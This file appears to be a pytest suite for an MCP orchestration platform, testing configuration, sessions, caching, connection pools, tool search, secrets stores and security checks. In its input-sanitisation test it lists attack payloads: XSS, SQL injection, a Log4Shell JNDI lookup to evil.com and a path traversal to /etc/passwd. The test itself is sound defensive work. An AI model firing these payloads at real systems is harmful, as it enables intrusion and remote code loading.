|
|
""" |
|
|
Comprehensive Testing Suite for MCP Orchestration Platform |
|
|
Enterprise-grade testing with high coverage and real-world scenarios |
|
|
""" |
|
|
|
|
|
import asyncio |
|
|
import pytest |
|
|
import tempfile |
|
|
import json |
|
|
import os |
|
|
from unittest.mock import Mock, AsyncMock, patch, MagicMock |
|
|
from typing import Dict, Any, List |
|
|
import time |
|
|
import uuid |
|
|
import hashlib |
|
|
|
|
|
|
|
|
from mcp_orchestrator import ( |
|
|
MCPOrchestrator, ConfigManager, SessionManager, MultiLayerCache, |
|
|
ConnectionPool, ToolManager, ServerConfig, SessionInfo, |
|
|
CircuitBreakerState, ServerState |
|
|
) |
|
|
from secrets_manager import ( |
|
|
SecretsManager, LocalSecretsStore, EnvironmentSecretsStore |
|
|
) |
|
|
from gradio_interface import MCPUI |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
@pytest.fixture |
|
|
def event_loop(): |
|
|
"""Create an instance of the default event loop for the test session.""" |
|
|
loop = asyncio.get_event_loop_policy().new_event_loop() |
|
|
yield loop |
|
|
loop.close() |
|
|
|
|
|
|
|
|
@pytest.fixture |
|
|
def temp_dir(): |
|
|
"""Create a temporary directory for tests.""" |
|
|
with tempfile.TemporaryDirectory() as tmp_dir: |
|
|
yield tmp_dir |
|
|
|
|
|
|
|
|
@pytest.fixture |
|
|
def sample_server_config(): |
|
|
"""Create a sample server configuration.""" |
|
|
return ServerConfig( |
|
|
id="test_server", |
|
|
name="Test MCP Server", |
|
|
url="http://localhost:8000", |
|
|
auth_token="test_token", |
|
|
timeout=30, |
|
|
max_retries=3, |
|
|
max_connections=5 |
|
|
) |
|
|
|
|
|
|
|
|
@pytest.fixture |
|
|
def mock_aiohttp_session(): |
|
|
"""Create a mock aiohttp session.""" |
|
|
session = Mock() |
|
|
session.get = AsyncMock() |
|
|
session.post = AsyncMock() |
|
|
session.close = AsyncMock() |
|
|
return session |
|
|
|
|
|
|
|
|
@pytest.fixture |
|
|
def orchestrator(): |
|
|
"""Create a test orchestrator instance.""" |
|
|
config = { |
|
|
'servers': { |
|
|
'test_server': { |
|
|
'name': 'Test Server', |
|
|
'url': 'http://localhost:8000', |
|
|
'auth_token': 'test_token' |
|
|
} |
|
|
}, |
|
|
'session_ttl': 3600, |
|
|
'cache_ttl': 300, |
|
|
'max_workers': 5 |
|
|
} |
|
|
|
|
|
with patch.object(ConfigManager, 'load_config', return_value=config): |
|
|
orchestrator = MCPOrchestrator() |
|
|
return orchestrator |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestConfigManager: |
|
|
"""Test configuration management functionality.""" |
|
|
|
|
|
def test_load_from_env(self, temp_dir): |
|
|
"""Test loading configuration from environment variables.""" |
|
|
os.environ['MCP_SERVER_TEST_SERVER_NAME'] = 'Test Server' |
|
|
os.environ['MCP_SERVER_TEST_SERVER_URL'] = 'http://localhost:8000' |
|
|
os.environ['MCP_HOST'] = '0.0.0.0' |
|
|
os.environ['MCP_PORT'] = '7860' |
|
|
os.environ['MCP_DEBUG'] = 'true' |
|
|
|
|
|
config_manager = ConfigManager() |
|
|
config = config_manager.load_from_env() |
|
|
|
|
|
assert 'servers' in config |
|
|
assert 'test_server' in config['servers'] |
|
|
assert config['servers']['test_server']['name'] == 'Test Server' |
|
|
assert config['host'] == '0.0.0.0' |
|
|
assert config['port'] == 7860 |
|
|
assert config['debug'] is True |
|
|
|
|
|
def test_load_from_json_file(self, temp_dir): |
|
|
"""Test loading configuration from JSON file.""" |
|
|
config_data = { |
|
|
'app_name': 'Test App', |
|
|
'host': 'localhost', |
|
|
'port': 8080, |
|
|
'servers': { |
|
|
'test_server': { |
|
|
'name': 'Test Server', |
|
|
'url': 'http://localhost:8000' |
|
|
} |
|
|
} |
|
|
} |
|
|
|
|
|
config_file = os.path.join(temp_dir, 'config.json') |
|
|
with open(config_file, 'w') as f: |
|
|
json.dump(config_data, f) |
|
|
|
|
|
config_manager = ConfigManager() |
|
|
config = config_manager.load_from_file(config_file) |
|
|
|
|
|
assert config['app_name'] == 'Test App' |
|
|
assert config['servers']['test_server']['name'] == 'Test Server' |
|
|
|
|
|
def test_merge_configs(self): |
|
|
"""Test merging multiple configuration dictionaries.""" |
|
|
config1 = {'a': 1, 'b': {'x': 1}} |
|
|
config2 = {'b': {'y': 2}, 'c': 3} |
|
|
config3 = {'d': 4} |
|
|
|
|
|
config_manager = ConfigManager() |
|
|
merged = config_manager.merge_configs(config1, config2, config3) |
|
|
|
|
|
assert merged['a'] == 1 |
|
|
assert merged['b']['x'] == 1 |
|
|
assert merged['b']['y'] == 2 |
|
|
assert merged['c'] == 3 |
|
|
assert merged['d'] == 4 |
|
|
|
|
|
def test_get_nested_config(self): |
|
|
"""Test getting nested configuration values.""" |
|
|
config_manager = ConfigManager() |
|
|
config_manager.config = { |
|
|
'servers': { |
|
|
'test': { |
|
|
'url': 'http://localhost:8000', |
|
|
'timeout': 30 |
|
|
} |
|
|
} |
|
|
} |
|
|
|
|
|
assert config_manager.get('servers.test.url') == 'http://localhost:8000' |
|
|
assert config_manager.get('servers.test.timeout') == 30 |
|
|
assert config_manager.get('servers.test.nonexistent', 'default') == 'default' |
|
|
assert config_manager.get('nonexistent.key', 'default') == 'default' |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestSessionManager: |
|
|
"""Test session management functionality.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_create_session(self, orchestrator): |
|
|
"""Test session creation.""" |
|
|
session = await orchestrator.session_manager.create_session( |
|
|
user_id="test_user", |
|
|
ip_address="127.0.0.1", |
|
|
user_agent="Test Agent" |
|
|
) |
|
|
|
|
|
assert session.session_id is not None |
|
|
assert session.user_id == "test_user" |
|
|
assert session.ip_address == "127.0.0.1" |
|
|
assert session.user_agent == "Test Agent" |
|
|
assert session.total_requests == 0 |
|
|
assert session.success_rate == 0.0 |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_get_session(self, orchestrator): |
|
|
"""Test session retrieval.""" |
|
|
|
|
|
created_session = await orchestrator.session_manager.create_session() |
|
|
|
|
|
|
|
|
retrieved_session = await orchestrator.session_manager.get_session( |
|
|
created_session.session_id |
|
|
) |
|
|
|
|
|
assert retrieved_session.session_id == created_session.session_id |
|
|
assert retrieved_session.user_id == created_session.user_id |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_session_expiry(self, orchestrator): |
|
|
"""Test session expiration.""" |
|
|
|
|
|
session = await orchestrator.session_manager.create_session() |
|
|
session.ttl_seconds = 1 |
|
|
|
|
|
|
|
|
retrieved = await orchestrator.session_manager.get_session(session.session_id) |
|
|
assert retrieved is not None |
|
|
|
|
|
|
|
|
await asyncio.sleep(2) |
|
|
|
|
|
|
|
|
retrieved = await orchestrator.session_manager.get_session(session.session_id) |
|
|
assert retrieved is None |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_rate_limiting(self, orchestrator): |
|
|
"""Test session rate limiting.""" |
|
|
session = await orchestrator.session_manager.create_session() |
|
|
|
|
|
|
|
|
allowed, wait_time = await orchestrator.session_manager.check_rate_limit( |
|
|
session.session_id |
|
|
) |
|
|
assert allowed is True |
|
|
assert wait_time == 0.0 |
|
|
|
|
|
|
|
|
limiter = orchestrator.session_manager.rate_limiters[session.session_id] |
|
|
limiter['requests'] = limiter['max_requests'] + 1 |
|
|
|
|
|
|
|
|
allowed, wait_time = await orchestrator.session_manager.check_rate_limit( |
|
|
session.session_id |
|
|
) |
|
|
assert allowed is False |
|
|
assert wait_time > 0 |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_session_stats(self, orchestrator): |
|
|
"""Test session statistics.""" |
|
|
|
|
|
sessions = [] |
|
|
for i in range(3): |
|
|
session = await orchestrator.session_manager.create_session() |
|
|
sessions.append(session) |
|
|
|
|
|
stats = await orchestrator.session_manager.get_session_stats() |
|
|
|
|
|
assert stats['total_sessions'] == 3 |
|
|
assert stats['active_connections'] == 0 |
|
|
assert 'avg_session_age' in stats |
|
|
assert 'rate_limited_sessions' in stats |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestMultiLayerCache: |
|
|
"""Test multi-layer caching functionality.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_cache_set_and_get(self): |
|
|
"""Test setting and getting cache entries.""" |
|
|
cache = MultiLayerCache(max_size=10) |
|
|
|
|
|
|
|
|
etag = await cache.set('test_key', {'data': 'test_value'}, ttl=300) |
|
|
assert etag is not None |
|
|
|
|
|
|
|
|
value, found, returned_etag = await cache.get('test_key') |
|
|
|
|
|
assert found is True |
|
|
assert value == {'data': 'test_value'} |
|
|
assert returned_etag == etag |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_cache_expiry(self): |
|
|
"""Test cache entry expiration.""" |
|
|
cache = MultiLayerCache(default_ttl=1) |
|
|
|
|
|
|
|
|
await cache.set('test_key', 'test_value', ttl=1) |
|
|
|
|
|
|
|
|
value, found, _ = await cache.get('test_key') |
|
|
assert found is True |
|
|
|
|
|
|
|
|
await asyncio.sleep(2) |
|
|
|
|
|
|
|
|
value, found, _ = await cache.get('test_key') |
|
|
assert found is False |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_cache_etag_support(self): |
|
|
"""Test ETag support for cache validation.""" |
|
|
cache = MultiLayerCache() |
|
|
|
|
|
|
|
|
etag = await cache.set('test_key', {'data': 'test_value'}) |
|
|
|
|
|
|
|
|
value, not_modified, returned_etag = await cache.get('test_key', etag=etag) |
|
|
assert not_modified is True |
|
|
assert returned_etag == etag |
|
|
|
|
|
|
|
|
value, not_modified, returned_etag = await cache.get('test_key', etag='different_etag') |
|
|
assert not_modified is False |
|
|
assert value == {'data': 'test_value'} |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_cache_lru_eviction(self): |
|
|
"""Test LRU cache eviction.""" |
|
|
cache = MultiLayerCache(max_size=2) |
|
|
|
|
|
|
|
|
await cache.set('key1', 'value1') |
|
|
await cache.set('key2', 'value2') |
|
|
|
|
|
|
|
|
await cache.set('key3', 'value3') |
|
|
|
|
|
|
|
|
value, found, _ = await cache.get('key1') |
|
|
assert found is False |
|
|
|
|
|
|
|
|
value, found, _ = await cache.get('key2') |
|
|
assert found is True |
|
|
value, found, _ = await cache.get('key3') |
|
|
assert found is True |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_cache_invalidation(self): |
|
|
"""Test cache invalidation.""" |
|
|
cache = MultiLayerCache() |
|
|
|
|
|
|
|
|
await cache.set('prefix_key1', 'value1') |
|
|
await cache.set('prefix_key2', 'value2') |
|
|
await cache.set('other_key', 'value3') |
|
|
|
|
|
|
|
|
await cache.invalidate_pattern('prefix_') |
|
|
|
|
|
|
|
|
value, found, _ = await cache.get('prefix_key1') |
|
|
assert found is False |
|
|
value, found, _ = await cache.get('prefix_key2') |
|
|
assert found is False |
|
|
|
|
|
|
|
|
value, found, _ = await cache.get('other_key') |
|
|
assert found is True |
|
|
|
|
|
def test_cache_statistics(self): |
|
|
"""Test cache statistics.""" |
|
|
cache = MultiLayerCache() |
|
|
|
|
|
|
|
|
cache.hits = 80 |
|
|
cache.misses = 20 |
|
|
|
|
|
stats = cache.get_stats() |
|
|
|
|
|
assert stats['size'] == 0 |
|
|
assert stats['hits'] == 80 |
|
|
assert stats['misses'] == 20 |
|
|
assert stats['hit_rate'] == 0.8 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestConnectionPool: |
|
|
"""Test connection pool functionality.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_pool_initialization(self, sample_server_config): |
|
|
"""Test connection pool initialization.""" |
|
|
from mcp_orchestrator import MCPOrcMetrics |
|
|
metrics = MCPOrcMetrics() |
|
|
|
|
|
pool = ConnectionPool(sample_server_config, metrics) |
|
|
await pool.initialize() |
|
|
|
|
|
assert len(pool.pool) > 0 |
|
|
assert not pool.available.empty() |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_get_connection(self, sample_server_config): |
|
|
"""Test getting connection from pool.""" |
|
|
from mcp_orchestrator import MCPOrcMetrics |
|
|
metrics = MCPOrcMetrics() |
|
|
|
|
|
pool = ConnectionPool(sample_server_config, metrics) |
|
|
await pool.initialize() |
|
|
|
|
|
|
|
|
async with pool.get_connection() as session: |
|
|
assert session is not None |
|
|
assert session in pool.in_use |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_circuit_breaker(self, sample_server_config): |
|
|
"""Test circuit breaker functionality.""" |
|
|
from mcp_orchestrator import MCPOrcMetrics |
|
|
metrics = MCPOrcMetrics() |
|
|
|
|
|
|
|
|
sample_server_config.circuit_breaker_threshold = 2 |
|
|
|
|
|
pool = ConnectionPool(sample_server_config, metrics) |
|
|
await pool.initialize() |
|
|
|
|
|
|
|
|
for _ in range(3): |
|
|
try: |
|
|
async with pool.get_connection() as session: |
|
|
|
|
|
raise Exception("Simulated failure") |
|
|
except Exception: |
|
|
pass |
|
|
|
|
|
|
|
|
assert pool.circuit_breaker_state == CircuitBreakerState.OPEN |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_health_check(self, sample_server_config): |
|
|
"""Test health check functionality.""" |
|
|
from mcp_orchestrator import MCPOrcMetrics |
|
|
metrics = MCPOrcMetrics() |
|
|
|
|
|
pool = ConnectionPool(sample_server_config, metrics) |
|
|
await pool.initialize() |
|
|
|
|
|
|
|
|
with patch('aiohttp.ClientSession.get') as mock_get: |
|
|
mock_response = Mock() |
|
|
mock_response.status = 200 |
|
|
mock_get.return_value.__aenter__ = AsyncMock(return_value=mock_response) |
|
|
|
|
|
is_healthy = await pool._perform_health_check() |
|
|
assert is_healthy is True |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestToolManager: |
|
|
"""Test tool management functionality.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_tool_schema_validation(self, orchestrator): |
|
|
"""Test tool parameter validation.""" |
|
|
|
|
|
tool_schema = { |
|
|
"name": "test_tool", |
|
|
"description": "Test tool", |
|
|
"input_schema": { |
|
|
"type": "object", |
|
|
"properties": { |
|
|
"param1": {"type": "string", "description": "First parameter"}, |
|
|
"param2": {"type": "number", "description": "Second parameter"} |
|
|
}, |
|
|
"required": ["param1"] |
|
|
} |
|
|
} |
|
|
|
|
|
|
|
|
valid_params = {"param1": "test", "param2": 123} |
|
|
orchestrator.tool_manager._validate_parameters(valid_params, tool_schema) |
|
|
|
|
|
|
|
|
invalid_params = {"param2": 123} |
|
|
with pytest.raises(ValueError): |
|
|
orchestrator.tool_manager._validate_parameters(invalid_params, tool_schema) |
|
|
|
|
|
|
|
|
invalid_params = {"param1": "test", "param2": "not_a_number"} |
|
|
with pytest.raises(ValueError): |
|
|
orchestrator.tool_manager._validate_parameters(invalid_params, tool_schema) |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_tool_search(self, orchestrator): |
|
|
"""Test tool search functionality.""" |
|
|
|
|
|
orchestrator.tools = { |
|
|
"server1": { |
|
|
"weather_tool": Mock( |
|
|
description="Get weather information", |
|
|
tags=["weather", "api"] |
|
|
), |
|
|
"calculator_tool": Mock( |
|
|
description="Perform calculations", |
|
|
tags=["math", "calculator"] |
|
|
) |
|
|
} |
|
|
} |
|
|
|
|
|
|
|
|
results = await orchestrator.tool_manager.search_tools("weather") |
|
|
assert len(results) > 0 |
|
|
assert any("weather" in result["tool_name"] for result in results) |
|
|
|
|
|
|
|
|
results = await orchestrator.tool_manager.search_tools("", tags=["weather"]) |
|
|
assert len(results) > 0 |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_relevance_scoring(self, orchestrator): |
|
|
"""Test relevance scoring for search results.""" |
|
|
from mcp_orchestrator import ToolSchema |
|
|
|
|
|
|
|
|
schema = ToolSchema( |
|
|
name="weather_forecast", |
|
|
description="Get weather forecast for locations", |
|
|
tags=["weather", "forecast", "climate"] |
|
|
) |
|
|
|
|
|
|
|
|
score_exact = orchestrator.tool_manager._calculate_relevance("weather_forecast", schema) |
|
|
score_partial = orchestrator.tool_manager._calculate_relevance("weather", schema) |
|
|
score_tag = orchestrator.tool_manager._calculate_relevance("climate", schema) |
|
|
|
|
|
assert score_exact > score_partial > score_tag |
|
|
assert score_exact == 1.0 |
|
|
|
|
|
def test_tool_statistics(self, orchestrator): |
|
|
"""Test tool manager statistics.""" |
|
|
|
|
|
orchestrator.tools = { |
|
|
"server1": {"tool1": Mock(), "tool2": Mock()}, |
|
|
"server2": {"tool3": Mock(), "tool4": Mock(), "tool5": Mock()} |
|
|
} |
|
|
|
|
|
stats = orchestrator.tool_manager.get_stats() |
|
|
|
|
|
assert stats["total_servers"] == 2 |
|
|
assert stats["total_tools"] == 5 |
|
|
assert stats["tools_per_server"] == 2.5 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestSecretsManager: |
|
|
"""Test secrets management functionality.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_local_secrets_store(self, temp_dir): |
|
|
"""Test local secrets storage.""" |
|
|
from cryptography.fernet import Fernet |
|
|
|
|
|
|
|
|
key = Fernet.generate_key() |
|
|
store = LocalSecretsStore(key, temp_dir) |
|
|
|
|
|
|
|
|
success = await store.set_secret('test_key', 'test_value', ttl=3600) |
|
|
assert success is True |
|
|
|
|
|
|
|
|
value = await store.get_secret('test_key') |
|
|
assert value == 'test_value' |
|
|
|
|
|
|
|
|
secrets = await store.list_secrets() |
|
|
assert 'test_key' in secrets |
|
|
|
|
|
|
|
|
success = await store.delete_secret('test_key') |
|
|
assert success is True |
|
|
|
|
|
|
|
|
value = await store.get_secret('test_key') |
|
|
assert value is None |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_secrets_expiry(self, temp_dir): |
|
|
"""Test secret expiration.""" |
|
|
from cryptography.fernet import Fernet |
|
|
|
|
|
key = Fernet.generate_key() |
|
|
store = LocalSecretsStore(key, temp_dir) |
|
|
|
|
|
|
|
|
await store.set_secret('test_key', 'test_value', ttl=1) |
|
|
|
|
|
|
|
|
value = await store.get_secret('test_key') |
|
|
assert value == 'test_value' |
|
|
|
|
|
|
|
|
await asyncio.sleep(2) |
|
|
|
|
|
|
|
|
value = await store.get_secret('test_key') |
|
|
assert value is None |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_environment_secrets_store(self): |
|
|
"""Test environment variable secrets store.""" |
|
|
store = EnvironmentSecretsStore() |
|
|
|
|
|
|
|
|
os.environ['MCP_SECRET_TEST_KEY'] = 'test_value' |
|
|
|
|
|
|
|
|
value = await store.get_secret('test_key') |
|
|
assert value == 'test_value' |
|
|
|
|
|
|
|
|
secrets = await store.list_secrets() |
|
|
assert 'test_key' in secrets |
|
|
|
|
|
|
|
|
success = await store.delete_secret('test_key') |
|
|
assert success is True |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_secrets_manager_orchestrator(self): |
|
|
"""Test secrets manager orchestrator.""" |
|
|
config = { |
|
|
'primary_backend': 'env', |
|
|
'env_enabled': True |
|
|
} |
|
|
|
|
|
manager = SecretsManager(config) |
|
|
|
|
|
|
|
|
os.environ['MCP_SECRET_TEST_KEY'] = 'test_value' |
|
|
|
|
|
|
|
|
value = await manager.get_secret('test_key') |
|
|
assert value == 'test_value' |
|
|
|
|
|
|
|
|
secrets = await manager.list_secrets() |
|
|
assert 'test_key' in secrets |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_secrets_rotation(self): |
|
|
"""Test secret rotation functionality.""" |
|
|
config = { |
|
|
'primary_backend': 'env', |
|
|
'env_enabled': True |
|
|
} |
|
|
|
|
|
manager = SecretsManager(config) |
|
|
|
|
|
|
|
|
os.environ['MCP_SECRET_OLD_KEY'] = 'old_value' |
|
|
|
|
|
|
|
|
success = await manager.rotate_secrets('old_key', 'new_key') |
|
|
assert success is True |
|
|
|
|
|
|
|
|
assert os.getenv('MCP_SECRET_OLD_KEY') != 'old_value' |
|
|
assert os.getenv('MCP_SECRET_NEW_KEY') == 'old_value' |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_health_check(self): |
|
|
"""Test secrets manager health check.""" |
|
|
config = { |
|
|
'primary_backend': 'env', |
|
|
'env_enabled': True |
|
|
} |
|
|
|
|
|
manager = SecretsManager(config) |
|
|
|
|
|
health = await manager.health_check() |
|
|
assert 'env' in health |
|
|
assert isinstance(health['env'], bool) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestOrchestratorIntegration: |
|
|
"""Test orchestrator integration scenarios.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_full_workflow(self, orchestrator): |
|
|
"""Test complete workflow from server registration to tool invocation.""" |
|
|
|
|
|
mock_tools = { |
|
|
"test_tool": { |
|
|
"name": "test_tool", |
|
|
"description": "Test tool", |
|
|
"input_schema": { |
|
|
"type": "object", |
|
|
"properties": { |
|
|
"message": {"type": "string"} |
|
|
}, |
|
|
"required": ["message"] |
|
|
} |
|
|
} |
|
|
} |
|
|
|
|
|
|
|
|
session = await orchestrator.session_manager.create_session() |
|
|
|
|
|
|
|
|
with patch.object( |
|
|
orchestrator.tool_manager, |
|
|
'_discover_tools', |
|
|
return_value=mock_tools |
|
|
): |
|
|
|
|
|
await orchestrator.register_server( |
|
|
ServerConfig( |
|
|
id="test_server", |
|
|
name="Test Server", |
|
|
url="http://localhost:8000" |
|
|
) |
|
|
) |
|
|
|
|
|
|
|
|
assert "test_server" in orchestrator.servers |
|
|
assert "test_server" in orchestrator.connection_pools |
|
|
|
|
|
|
|
|
with patch.object( |
|
|
orchestrator.connection_pools["test_server"], |
|
|
'get_connection' |
|
|
) as mock_get_connection: |
|
|
mock_session = AsyncMock() |
|
|
mock_response = AsyncMock() |
|
|
mock_response.json.return_value = { |
|
|
"result": {"message": "Tool executed successfully"} |
|
|
} |
|
|
mock_response.raise_for_status = Mock() |
|
|
mock_session.post.return_value.__aenter__ = AsyncMock(return_value=mock_response) |
|
|
mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=mock_session) |
|
|
|
|
|
|
|
|
result = await orchestrator.invoke_tool( |
|
|
"test_server", |
|
|
"test_tool", |
|
|
{"message": "Hello, world!"}, |
|
|
session.session_id |
|
|
) |
|
|
|
|
|
assert result["status"] == "success" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_error_handling(self, orchestrator): |
|
|
"""Test error handling in various scenarios.""" |
|
|
|
|
|
with pytest.raises(ValueError): |
|
|
await orchestrator.invoke_tool( |
|
|
"non_existent_server", |
|
|
"test_tool", |
|
|
{}, |
|
|
"test_session" |
|
|
) |
|
|
|
|
|
|
|
|
with pytest.raises(ValueError): |
|
|
await orchestrator.invoke_tool( |
|
|
"test_server", |
|
|
"test_tool", |
|
|
{}, |
|
|
"non_existent_session" |
|
|
) |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_concurrent_requests(self, orchestrator): |
|
|
"""Test handling of concurrent requests.""" |
|
|
|
|
|
sessions = [] |
|
|
for i in range(5): |
|
|
session = await orchestrator.session_manager.create_session() |
|
|
sessions.append(session) |
|
|
|
|
|
|
|
|
tasks = [] |
|
|
for i, session in enumerate(sessions): |
|
|
task = orchestrator.invoke_tool( |
|
|
"test_server", |
|
|
"test_tool", |
|
|
{"request_id": i}, |
|
|
session.session_id |
|
|
) |
|
|
tasks.append(task) |
|
|
|
|
|
|
|
|
with patch.object( |
|
|
orchestrator.connection_pools["test_server"], |
|
|
'get_connection' |
|
|
) as mock_get_connection: |
|
|
mock_session = AsyncMock() |
|
|
mock_response = AsyncMock() |
|
|
mock_response.json.return_value = {"result": "success"} |
|
|
mock_response.raise_for_status = Mock() |
|
|
mock_session.post.return_value.__aenter__ = AsyncMock(return_value=mock_response) |
|
|
mock_get_connection.return_value.__aenter__ = AsyncMock(return_value=mock_session) |
|
|
|
|
|
|
|
|
with patch.object(orchestrator, 'register_server'): |
|
|
|
|
|
await orchestrator.register_server( |
|
|
ServerConfig( |
|
|
id="test_server", |
|
|
name="Test Server", |
|
|
url="http://localhost:8000" |
|
|
) |
|
|
) |
|
|
|
|
|
|
|
|
results = await asyncio.gather(*tasks, return_exceptions=True) |
|
|
|
|
|
|
|
|
for result in results: |
|
|
if isinstance(result, Exception): |
|
|
pytest.fail(f"Unexpected exception: {result}") |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_metrics_collection(self, orchestrator): |
|
|
"""Test metrics collection and reporting.""" |
|
|
|
|
|
session = await orchestrator.session_manager.create_session() |
|
|
|
|
|
|
|
|
metrics = await orchestrator.get_metrics() |
|
|
|
|
|
assert "servers" in metrics |
|
|
assert "session_stats" in metrics |
|
|
assert "cache_stats" in metrics |
|
|
assert "tool_stats" in metrics |
|
|
|
|
|
|
|
|
session_stats = metrics["session_stats"] |
|
|
assert session_stats["total_sessions"] >= 1 |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_graceful_shutdown(self, orchestrator): |
|
|
"""Test graceful shutdown process.""" |
|
|
|
|
|
orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1))) |
|
|
orchestrator.background_tasks.add(asyncio.create_task(asyncio.sleep(1))) |
|
|
|
|
|
|
|
|
await orchestrator.shutdown() |
|
|
|
|
|
|
|
|
for task in orchestrator.background_tasks: |
|
|
assert task.cancelled() |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestPerformance: |
|
|
"""Test performance characteristics.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_cache_performance(self): |
|
|
"""Test cache performance with large datasets.""" |
|
|
cache = MultiLayerCache(max_size=1000) |
|
|
|
|
|
|
|
|
start_time = time.time() |
|
|
for i in range(1000): |
|
|
await cache.set(f"key_{i}", f"value_{i}") |
|
|
set_time = time.time() - start_time |
|
|
|
|
|
|
|
|
start_time = time.time() |
|
|
for i in range(1000): |
|
|
await cache.get(f"key_{i}") |
|
|
get_time = time.time() - start_time |
|
|
|
|
|
|
|
|
assert set_time < 1.0 |
|
|
assert get_time < 1.0 |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_session_creation_performance(self, orchestrator): |
|
|
"""Test session creation performance.""" |
|
|
|
|
|
start_time = time.time() |
|
|
sessions = [] |
|
|
for i in range(100): |
|
|
session = await orchestrator.session_manager.create_session() |
|
|
sessions.append(session) |
|
|
creation_time = time.time() - start_time |
|
|
|
|
|
|
|
|
assert creation_time < 1.0 |
|
|
|
|
|
|
|
|
for session in sessions: |
|
|
retrieved = await orchestrator.session_manager.get_session(session.session_id) |
|
|
assert retrieved is not None |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_memory_usage(self, orchestrator): |
|
|
"""Test memory usage under load.""" |
|
|
import psutil |
|
|
import os |
|
|
|
|
|
process = psutil.Process(os.getpid()) |
|
|
initial_memory = process.memory_info().rss |
|
|
|
|
|
|
|
|
sessions = [] |
|
|
for i in range(1000): |
|
|
session = await orchestrator.session_manager.create_session() |
|
|
sessions.append(session) |
|
|
|
|
|
|
|
|
final_memory = process.memory_info().rss |
|
|
memory_increase = final_memory - initial_memory |
|
|
|
|
|
|
|
|
assert memory_increase < 100 * 1024 * 1024 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class TestSecurity: |
|
|
"""Test security features.""" |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_input_sanitization(self, orchestrator): |
|
|
"""Test input sanitization and validation.""" |
|
|
|
|
|
malicious_inputs = [ |
|
|
"<script>alert('xss')</script>", |
|
|
"'; DROP TABLE users; --", |
|
|
"${jndi:ldap://evil.com/a}", |
|
|
"../../../etc/passwd", |
|
|
"eval('malicious_code')" |
|
|
] |
|
|
|
|
|
for malicious_input in malicious_inputs: |
|
|
|
|
|
session = await orchestrator.session_manager.create_session() |
|
|
try: |
|
|
|
|
|
await orchestrator.invoke_tool( |
|
|
"test_server", |
|
|
"test_tool", |
|
|
{"param": malicious_input}, |
|
|
session.session_id |
|
|
) |
|
|
except ValueError as e: |
|
|
|
|
|
assert "validation" in str(e).lower() or "invalid" in str(e).lower() |
|
|
except Exception: |
|
|
|
|
|
pass |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_rate_limiting_security(self, orchestrator): |
|
|
"""Test rate limiting prevents abuse.""" |
|
|
|
|
|
session = await orchestrator.session_manager.create_session() |
|
|
|
|
|
|
|
|
requests_made = 0 |
|
|
rate_limited = 0 |
|
|
|
|
|
for i in range(150): |
|
|
allowed, wait_time = await orchestrator.session_manager.check_rate_limit( |
|
|
session.session_id |
|
|
) |
|
|
|
|
|
if allowed: |
|
|
requests_made += 1 |
|
|
|
|
|
await orchestrator.session_manager.update_session_activity(session.session_id) |
|
|
else: |
|
|
rate_limited += 1 |
|
|
assert wait_time > 0 |
|
|
|
|
|
|
|
|
assert requests_made <= 100 |
|
|
assert rate_limited > 0 |
|
|
|
|
|
@pytest.mark.asyncio |
|
|
async def test_session_isolation(self, orchestrator): |
|
|
"""Test session isolation and security.""" |
|
|
|
|
|
session1 = await orchestrator.session_manager.create_session(user_id="user1") |
|
|
session2 = await orchestrator.session_manager.create_session(user_id="user2") |
|
|
|
|
|
|
|
|
assert session1.session_id != session2.session_id |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
session1.ttl_seconds = 1 |
|
|
await asyncio.sleep(2) |
|
|
|
|
|
|
|
|
expired_session = await orchestrator.session_manager.get_session(session1.session_id) |
|
|
assert expired_session is None |
|
|
|
|
|
|
|
|
